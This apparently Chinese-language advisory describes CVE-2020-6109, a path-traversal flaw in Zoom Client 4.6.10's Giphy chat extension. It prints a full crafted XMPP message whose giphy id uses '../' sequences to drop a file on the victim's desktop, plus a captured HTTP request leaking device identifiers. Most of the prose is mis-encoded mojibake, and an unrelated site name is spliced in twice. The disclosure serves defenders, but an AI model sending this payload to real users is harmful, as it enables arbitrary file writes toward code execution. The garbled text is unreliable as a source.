CVE-2020-6109 | ZOOM¿Í»§¶Ëõè¾¶±éÀú·ì϶¹«¸æ

°ä²¼¹¦·ò 2020-06-05

0x00 ·ì϶¸ÅÊö



CVE   ID

CVE-2020-6109

ʱ    ¼ä

2020-06-04

Àà    ÐÍ

DT

µÈ    ¼¶

¸ßΣ

Ô¶³ÌÀûÓÃ

ÊÇ

Ó°ÏìÁìÓò

Zoom Client 4.6.10


0x01 ·ì϶ÏêÇé


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾



Zoom ClientÊÇÃÀ¹úZoom¹«Ë¾µÄÒ»¿îÖ§³Ö¶àÖÔì½Ì¨µÄÊÓÆµ»áÒé¿Í»§¶ËÀûÓ÷¨Ê½¡£


CVE-2020-6109ÔÚZoom Client°æ±¾4.6.10ÖдæÔÚ¿ÉÀûÓõÄõè¾¶±éÀú·ì϶£¬¸Ã·ì϶ÔÚ´¦ÖÃÔ̺¬¶¯»­GIFµÄÐÂÎÅʱ¡£ÌØÔìµÄ̸ÌìÐÂÎÅ¿ÉÄܵ¼ÖÂËÁÒâÎļþдÈ룬¿ÉÄÜ»á½øÒ»²½ÀÄÓøÃÎļþÒÔʵÏÖËÁÒâ´úÂëÖ´ÐС£¹¥»÷Õß±ØÒªÏòÖ¸±êÓû§»ò×é·¢ËÍÌØÔìÐÂÎÅÄÜÁ¦´¥·¢´Ë·ì϶¡£


ZoomµÄ̸ÌìÖ°ÄܳÉÁ¢ÔÚXMPP³ß¶ÈµÄ»ù´¡ÉÏ£¬²¢ÓµÓÐÖ§³ÔìäËûÀ©´óÖ°ÄÜ¡£ÕâЩÀ©´óÖ®Ò»Ö§³ÖÔÚ̸ÌìÖÐÔ̺¬¶¯»­GIFÐÂÎŵÄÖ°ÄÜ¡£Ìṩ´ËÖ°Äܲ¢ÒÀÀµGiphy·þÎñ¡£µ±¿Í»§¶ËÊÕµ½´øÓдËgiphyÀ©´óÃûµÄXMPPÐÂÎÅʱ£¬½«ÅúʾÆä½Ó¼ûÖ¸¶¨µÄHTTP URL²¢»ñÈ¡GIFÎļþ·¢Ë͸øÓû§¡£´ËÀàXMPPÐÂÎŵÄʾÀýÈçÏ£º


<message from='source@xmpp.zoom.us' to='destination@xmpp.zoom.us' id='random' type='chat'>

   <body>User Name sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>

   <thread>RANDOM</thread>

   <active xmlns='http://jabber.org/protocol/chatstates'/>

   <sns>

       <format>%1$@ sent you a picture</format>

       <args>

           <arg>User Name</arg>

       </args>

   </sns>

       <giphy id='filename' url='image_url' tags='congrats'>

           <pcInfo url='image_url_for_pc_display' size='10'/>

           <mobileInfo url='image_url_for_mobile_display' size='10'/>

           <bigPicInfo url='image_url_for_full_size_display' size='10'/>

       </giphy>

       <zmext expire_t='timestamp' prev='timestamp' t='timestamp'>

           <from n='User Name' e='email' res='ZoomChat_pc'/>

           <to/>

           <visible>true</visible>

           <msg_feature>0</msg_feature>

       </zmext>

</message>


ÉÏÃæµÄXML´úÂëÖÐÓÐÁ½¸öÖµ±ØÒª¹Ø×¢¡£Ê×ÏÈ£¬¸Ãgiphy±êÇ©Ô̺¬Èý¸öÖ¸±êURL£¬ÕâЩURLÓ¦¸ÃÖ¸ÏòGiphyµÄ·þÎñÆ÷¡£¼ò¶ÌµÄ²âÊÔÅú×¢£¬Ã»ÓÐÖ´ÐÐÖ¸±êURLµÄÑéÖ¤£¬²¢ÇÒ¿Í»§¶Ë½«×ñÑ­Ö¸¶¨µÄURL£¬Ô̺¬ËÁÒâ·þÎñÆ÷¡£Ö¸¶¨×Ô½ç˵URLʱ£¬Äܹ»¹Û²ìµ½À´×Ô¿Í»§¶ËµÄHTTPÏνӣº


GET /test.gif HTTP/1.1

Host: example.com

User-Agent: Mozilla/5.0 (ZOOM.Mac 10.14.6 x86)

Accept: */*

Cookie: srid=SaaSbeeTestMode00123578;

ZM-CAP: 2535978022733895607,164

ZM-PROP: Mac.Zoom

ZM-NSGN:2,zVM1hmoFnK2kx8t/KEifN7IAXRSE/CnqolsM0zV6ess=,1586812854000


Ó¦¸ÃÖ¸³öµÄÊÇ£¬Ö»¹ÜÒÔÉÏÒªÇóÖÐûÓÐÑéÖ¤cookie£¬µ«ÈÔÓÐ×ã¹»µÄÐÅϢй¶Ψһ±êʶµÄ¿Í»§¶Ë¡£±êÍ·ZM-NSGNÔ̺¬¾­¹ý¹þÏ£´¦ÖúͱàÂëµÄΨһ¿Í»§¶ËÉ豸ID¡£


²âÊÔ·¢ÏÖ¼´±ãgiphyÀ©´óÃû½öÏÔʾGIFͼÏñ£¬ËüÒ²½«ÇáËÉÏÔʾºÍÔ¤ÀÀÆäËûͼÏñÀàÐÍ¡£ÕâÔ̺¬PNGºÍJPEGÎļþÌåʽ¡£


´ËÐÂÎÅXML´úÂëÖеĵڶþ¼þÓÐȤµÄÊÂÊÇ£¬ÏóÕ÷µÄidÊôÐÔgiphyÖ±½ÓÓë¿Í»§¶Ë»º´æÔÚ´ÅÅÌÉϵÄͼÏñÎļþÃûÓйØÁª¡£»»¾ä»°Ëµ£¬¿Í»§¶ËÀûÓ÷¨Ê½½«Ê¹ÓôËÖ¸¶¨µÄID½«Îļþ±£Áôµ½´ÅÅÌÒÔ¹©½«À´ÏÔʾ¡£Äܹ»ÌṩËÁÒâÎļþÃû£¬²¢ÇÒÎļþ½«´æ´¢ÔÚdataZoom×°ÖÃĿ¼ÏÂĿ¼ÖеĿÉÔ¤²âµØÎ»¡£


ÕæÕýµÄ·ì϶ÔÚÓÚÕâÑùµÄÇé¿ö£¬¼´ÎļþÃûûÓÐÒÔÈκη½Ê½É¾³ý£¬²¢ÔÊÐíĿ¼±éÀú¡£ÕâÒâζ×ÅÏóÕ÷µÄÌØÔìidÊôÐÔgiphyÄܹ»Ô̺¬Ò»¸öÌØÊâÎļþõè¾¶£¬¸Ãõè¾¶½«ÔÚZoomµÄ×°ÖÃĿ¼֮±í²¢ÇÒÏÖʵÉÏÔÚµ±Ç°Óû§¿ÉдµÄÈκÎĿ¼ÖÐдÈëÎļþ¡£ÒÔÏÂÅú¸ÄµÄmessage˵ÁËÈ»ÕâÖÖ¿ÉÄÜÐÔ£º


<message from='source@xmpp.zoom.us' to='destination@xmpp.zoom.us' id='random' type='chat'>

   <body>User Name sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body>

   <thread>RANDOM</thread>

   <active xmlns='http://jabber.org/protocol/chatstates'/>

   <sns>

       <format>%1$@ sent you a picture</format>

       <args>

           <arg>User Name</arg>

       </args>

   </sns>

   <giphy id='../../../../../../Desktop/mallicious_file.exe' url='image_url' tags='congrats'>

           <pcInfo url='image_url_for_pc_display' size='10'/>

           <mobileInfo url='image_url_for_mobile_display' size='10'/>

           <bigPicInfo url='image_url_for_full_size_display' size='10'/>

       </giphy>

       <zmext expire_t='timestamp' prev='timestamp' t='timestamp'>

           <from n='User Name' e='email' res='ZoomChat_pc'/>

           <to/>

           <visible>true</visible>

           <msg_feature>0</msg_feature>

       </zmext>

</message>


Zoom¿Í»§¶Ë»á½«×Ö·û´®¸½¼Ó_BigPic.gifµ½Ö¸¶¨µÄÎļþÃûÕâÒ»ÊÂʵÄܹ»²¿ÃÅ»º½â´Ë·ì϶¡£ÕâÑùÄܹ»Ô¤·À¹¥»÷Õß´´½¨ÓµÓÐËÁÒâÀ©´óÃûµÄ¿ÉÆëÈ«½ÚÔìµÄÎļþ¡£ÈôÊǹ¥»÷ÕßÑ¡ÔñÁË.gifÀ©´óÃû£¬ÒÔÉÏÄÚÈÝÈÔ½«Ê¹ÓÃÎļþÃû½«ËÁÒâÄÚÈݵÄÎļþ¸éÖõ½µ±Ç°Óû§µÄ×ÀÃæÉÏ¡£ÎļþµÄÄÚÈݲ»½öÏÞÓÚͼÏñ£¬»¹¿ÉÄÜÔ̺¬¿ÉÖ´ÐдúÂë»ò¾ç±¾£¬ÕâЩ´úÂë»ò¾ç±¾¿ÉÄܱ»ÀÄÓÃÒÔÔ®ÊÖÀûÓÃÁíÒ»¸ö·ì϶¡£

´Ë±í¿ÉÄÜ»áÔÚWindowsϵͳÉÏ´´½¨¿ÕÎļþµÄËÁÒâÀ©´óÃû¡£


0x02 ´ëÖý¨Òé


Ŀǰ³§ÉÌÒѰ䲼4.6.12°æ±¾ÒÔ½¨¸´·ì϶£¬ÏÂÔØµØÖ·£º

https://zoom.us/


0x03 ÓйØÐÂÎÅ


https://securityaffairs.co/wordpress/104249/hacking/zoom-security-flaws.html


0x04 ²Î¿¼Á´½Ó


https://talosintelligence.com/vulnerability_reports/TALOS-2020-1055


0x05 ¹¦·òÏß


2020-04-16 ×êÑÐÈËÔ±Åû¶

2020-06-04 VSRC°ä²¼·ì϶¹«¸æ


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾